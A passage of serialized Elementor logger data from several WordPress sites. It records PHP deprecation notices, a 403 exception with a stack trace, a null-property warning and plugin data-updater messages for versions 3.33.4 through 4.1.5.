instead\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:5:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:94:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor/core/logger/manager.php\";}s:8:\"function\";s:7:\"include\";}i:2;a:5:{s:4:\"file\";s:113:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/models/note.php\";s:4:\"line\";i:253;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}i:3;a:5:{s:4:\"file\";s:108:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/document-events.php\";s:4:\"line\";i:71;s:8:\"function\";s:5:\"query\";s:5:\"class\";s:47:\"ElementorPro\\Modules\\Notes\\Database\\Models\\Note\";s:4:\"type\";s:2:\"::\";}i:4;a:5:{s:4:\"file\";s:108:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/document-events.php\";s:4:\"line\";i:26;s:8:\"function\";s:24:\"clear_after_post_deleted\";s:5:\"class\";s:42:\"ElementorPro\\Modules\\Notes\\Document_Events\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-01-07 11:02:07\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:192:\"ElementorPro\\Modules\\Notes\\Database\\Query\\Note_Query_Builder::__construct(): Implicitly marking parameter $connection as nullable is deprecated, the explicit nullable type must be used instead\";s:4:\"file\";s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";s:4:\"line\";i:38;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";s:7:\"\0*\0line\";i:38;}s:32:\"3f2fc56f893403aa3a90d581030613f9\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-01-07 11:02:07\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:191:\"ElementorPro\\Modules\\Notes\\Database\\Query\\Note_Query_Builder::with_replies(): Implicitly marking parameter $callback as nullable is deprecated, the explicit nullable type must be used instead\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:5:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:94:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor/core/logger/manager.php\";}s:8:\"function\";s:7:\"include\";}i:2;a:5:{s:4:\"file\";s:113:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/models/note.php\";s:4:\"line\";i:253;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}i:3;a:5:{s:4:\"file\";s:108:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/document-events.php\";s:4:\"line\";i:71;s:8:\"function\";s:5:\"query\";s:5:\"class\";s:47:\"ElementorPro\\Modules\\Notes\\Database\\Models\\Note\";s:4:\"type\";s:2:\"::\";}i:4;a:5:{s:4:\"file\";s:108:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/document-events.php\";s:4:\"line\";i:26;s:8:\"function\";s:24:\"clear_after_post_deleted\";s:5:\"class\";s:42:\"ElementorPro\\Modules\\Notes\\Document_Events\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-01-07 11:02:07\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:191:\"ElementorPro\\Modules\\Notes\\Database\\Query\\Note_Query_Builder::with_replies(): Implicitly marking parameter $callback as nullable is deprecated, the explicit nullable type must be used instead\";s:4:\"file\";s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";s:4:\"line\";i:75;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";s:7:\"\0*\0line\";i:75;}s:32:\"e0170d879185471201c231e4ff1e338f\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-01-07 11:02:07\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:178:\"ElementorPro\\Core\\Database\\Model_Query_Builder::__construct(): Implicitly marking parameter $connection as nullable is deprecated, the explicit nullable type must be used instead\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:5:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:94:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor/core/logger/manager.php\";}s:8:\"function\";s:7:\"include\";}i:2;a:5:{s:4:\"file\";s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";s:4:\"line\";i:24;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}i:3;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";}s:8:\"function\";s:7:\"include\";}i:4;a:5:{s:4:\"file\";s:113:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/models/note.php\";s:4:\"line\";i:253;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-01-07 11:02:07\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:178:\"ElementorPro\\Core\\Database\\Model_Query_Builder::__construct(): Implicitly marking parameter $connection as nullable is deprecated, the explicit nullable type must be used instead\";s:4:\"file\";s:112:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/model-query-builder.php\";s:4:\"line\";i:29;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:112:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/model-query-builder.php\";s:7:\"\0*\0line\";i:29;}s:32:\"8b497a3a4218f04ea02c669c94dfdf13\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-01-07 11:02:07\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:172:\"ElementorPro\\Core\\Database\\Query_Builder::__construct(): Implicitly marking parameter $connection as nullable is deprecated, the explicit nullable type must be used instead\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:5:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:94:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor/core/logger/manager.php\";}s:8:\"function\";s:7:\"include\";}i:2;a:5:{s:4:\"file\";s:112:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/model-query-builder.php\";s:4:\"line\";i:8;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}i:3;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:112:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/model-query-builder.php\";}s:8:\"function\";s:7:\"include\";}i:4;a:5:{s:4:\"file\";s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";s:4:\"line\";i:24;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-01-07 11:02:07\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:172:\"ElementorPro\\Core\\Database\\Query_Builder::__construct(): Implicitly marking parameter $connection as nullable is deprecated, the explicit nullable type must be used instead\";s:4:\"file\";s:106:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/query-builder.php\";s:4:\"line\";i:137;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:106:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/query-builder.php\";s:7:\"\0*\0line\";i:137;}s:32:\"8d76fdae4f4c5644c33082fb79cc4e7a\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-01-07 11:02:07\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:169:\"ElementorPro\\Core\\Database\\Query_Builder::when(): Implicitly marking parameter $false_callback as nullable is deprecated, the explicit nullable type must be used instead\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:5:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:94:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor/core/logger/manager.php\";}s:8:\"function\";s:7:\"include\";}i:2;a:5:{s:4:\"file\";s:112:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/model-query-builder.php\";s:4:\"line\";i:8;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}i:3;a:4:{s:4:\"file\";s:85:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/plugin.php\";s:4:\"line\";i:172;s:4:\"args\";a:1:{i:0;s:112:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/model-query-builder.php\";}s:8:\"function\";s:7:\"include\";}i:4;a:5:{s:4:\"file\";s:126:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/modules/notes/database/query/note-query-builder.php\";s:4:\"line\";i:24;s:8:\"function\";s:8:\"autoload\";s:5:\"class\";s:19:\"ElementorPro\\Plugin\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-01-07 11:02:07\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:169:\"ElementorPro\\Core\\Database\\Query_Builder::when(): Implicitly marking parameter $false_callback as nullable is deprecated, the explicit nullable type must be used instead\";s:4:\"file\";s:106:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/query-builder.php\";s:4:\"line\";i:268;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:106:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/query-builder.php\";s:7:\"\0*\0line\";i:268;}s:32:\"f48d6c69bcf558580fa33c433c24f9aa\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-02-23 00:43:15\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-02-23 00:43:15\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"6579b4dffee16cff63ed4510e6cd24c5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-02-23 00:43:15\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-02-23 00:43:15\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"ef3ccdb593abe1e3951f8e9f0e3e1ee7\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-02-23 00:43:16\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-02-23 00:43:16\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"4fa9318b4e016931354dca32eca68ef5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-02-23 00:43:16\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.33.4\";s:2:\"to\";s:6:\"3.35.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-02-23 00:43:16\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.33.4\";s:2:\"to\";s:6:\"3.35.5\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"d57bd8afba09a56c0ed38c5da3f226c6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-02-23 00:43:16\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.33.4\";s:2:\"to\";s:6:\"3.35.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-02-23 00:43:16\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.33.4\";s:2:\"to\";s:6:\"3.35.5\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"b08f54b51e1ded5b686fe6b8bfe4ceb0\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-02-24 06:13:35\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:1825:\"Uncaught WpOrg\\Requests\\Exception\\Http\\Status403: 403 Forbidden in /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/modules/cloud-library/module.php:207\nStack trace:\n#0 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/modules/cloud-library/module.php(57): Elementor\\Modules\\CloudLibrary\\Module->is_screenshot_proxy_mode(Array)\n#1 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/core/base/module.php(86): Elementor\\Modules\\CloudLibrary\\Module->__construct()\n#2 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/core/modules-manager.php(64): Elementor\\Core\\Base\\Module::instance()\n#3 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/includes/plugin.php(703): Elementor\\Core\\Modules_Manager->__construct()\n#4 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/includes/plugin.php(621): Elementor\\Plugin->init_components()\n#5 /home/msgdhg02/public_html/yok789ss.com/wp-includes/class-wp-hook.php(341): Elementor\\Plugin->init('')\n#6 /home/msgdhg02/public_html/yok789ss.com/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters(NULL, Array)\n#7 /home/msgdhg02/public_html/yok789ss.com/wp-includes/plugin.php(522): WP_Hook->do_action(Array)\n#8 /home/msgdhg02/public_html/yok789ss.com/wp-settings.php(742): do_action('init')\n#9 /home/msgdhg02/public_html/yok789ss.com/wp-config.php(100): require_once('/home/msgdhg02/...')\n#10 /home/msgdhg02/public_html/yok789ss.com/wp-load.php(50): require_once('/home/msgdhg02/...')\n#11 /home/msgdhg02/public_html/yok789ss.com/wp-blog-header.php(13): require_once('/home/msgdhg02/...')\n#12 /home/msgdhg02/public_html/yok789ss.com/index.php(17): require('/home/msgdhg02/...')\n#13 {main}\n thrown\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-02-24 06:13:35\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:5:\"error\";s:7:\"message\";s:1744:\"Uncaught WpOrg\\Requests\\Exception\\Http\\Status403: 403 Forbidden in /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/modules/cloud-library/module.php:207\nStack trace:\n#0 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/modules/cloud-library/module.php(57): Elementor\\Modules\\CloudLibrary\\Module->is_screenshot_proxy_mode(Array)\n#1 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/core/base/module.php(86): Elementor\\Modules\\CloudLibrary\\Module->__construct()\n#2 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/core/modules-manager.php(64): Elementor\\Core\\Base\\Module::instance()\n#3 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/includes/plugin.php(703): Elementor\\Core\\Modules_Manager->__construct()\n#4 /home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/includes/plugin.php(621): Elementor\\Plugin->init_components()\n#5 /home/msgdhg02/public_html/yok789ss.com/wp-includes/class-wp-hook.php(341): Elementor\\Plugin->init(\'\')\n#6 /home/msgdhg02/public_html/yok789ss.com/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters(NULL, Array)\n#7 /home/msgdhg02/public_html/yok789ss.com/wp-includes/plugin.php(522): WP_Hook->do_action(Array)\n#8 /home/msgdhg02/public_html/yok789ss.com/wp-settings.php(742): do_action(\'init\')\n#9 /home/msgdhg02/public_html/yok789ss.com/wp-config.php(100): require_once(\'/home/msgdhg02/...\')\n#10 /home/msgdhg02/public_html/yok789ss.com/wp-load.php(50): require_once(\'/home/msgdhg02/...\')\n#11 /home/msgdhg02/public_html/yok789ss.com/wp-blog-header.php(13): require_once(\'/home/msgdhg02/...\')\n#12 /home/msgdhg02/public_html/yok789ss.com/index.php(17): require(\'/home/msgdhg02/...\')\n#13 {main}\n thrown\";s:4:\"file\";s:101:\"/home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/modules/cloud-library/module.php\";s:4:\"line\";i:207;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:101:\"/home/msgdhg02/public_html/yok789ss.com/wp-content/plugins/elementor/modules/cloud-library/module.php\";s:7:\"\0*\0line\";i:207;}s:32:\"19bae9e5149dd3d6814717fafe229de5\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-02-25 03:02:00\";s:7:\"\0*\0type\";s:7:\"warning\";s:10:\"\0*\0message\";s:55:\"Attempt to read property "post_title" on null\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:2;s:14:\"\0*\0times_dates\";a:2:{i:0;s:19:\"2026-02-25 03:02:00\";i:1;s:19:\"2026-02-25 03:02:01\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:7:\"warning\";s:7:\"message\";s:45:\"Attempt to read property \"post_title\" on null\";s:4:\"file\";s:106:\"/home/msgdhg02/public_html/amb18slot.com/wp-content/plugins/elementor/core/isolation/elementor-adapter.php\";s:4:\"line\";i:28;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:106:\"/home/msgdhg02/public_html/amb18slot.com/wp-content/plugins/elementor/core/isolation/elementor-adapter.php\";s:7:\"\0*\0line\";i:28;}s:32:\"e5f9c547784ad32c630fa082a0a572d6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-02 09:40:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.35.5\";s:2:\"to\";s:5:\"4.1.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-02 09:40:55\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.35.5\";s:2:\"to\";s:5:\"4.1.4\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"a397a68c3d8a1b0839fd22edd49246e6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-02 09:41:05\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-02 09:41:05\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"e48ecb8849af68af24a602def02e2ca6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-02 09:41:05\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-02 09:41:05\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"285a85d326844ab260fe926db25c9235\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-02 09:41:06\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-02 09:41:06\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"e44428ac8228e949735813d9ccff4e18\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-02 09:41:06\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.35.5\";s:2:\"to\";s:5:\"4.1.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-02 09:41:06\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.35.5\";s:2:\"to\";s:5:\"4.1.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"7069b41e159ff06c7411641754b226fa\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-16 06:46:35\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.4\";s:2:\"to\";s:5:\"4.1.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-16 06:46:35\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"4.1.4\";s:2:\"to\";s:5:\"4.1.5\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"028d6cb69c732746dcabe6eda904f1cd\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-16 06:46:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-16 06:46:50\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"ee33b8933fdc581015b434aa9a600095\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-16 06:46:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2026-07-16 06:46:50\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"269b64b86de43f2731423a065f0bb811\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2026-07-16 06:46:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version 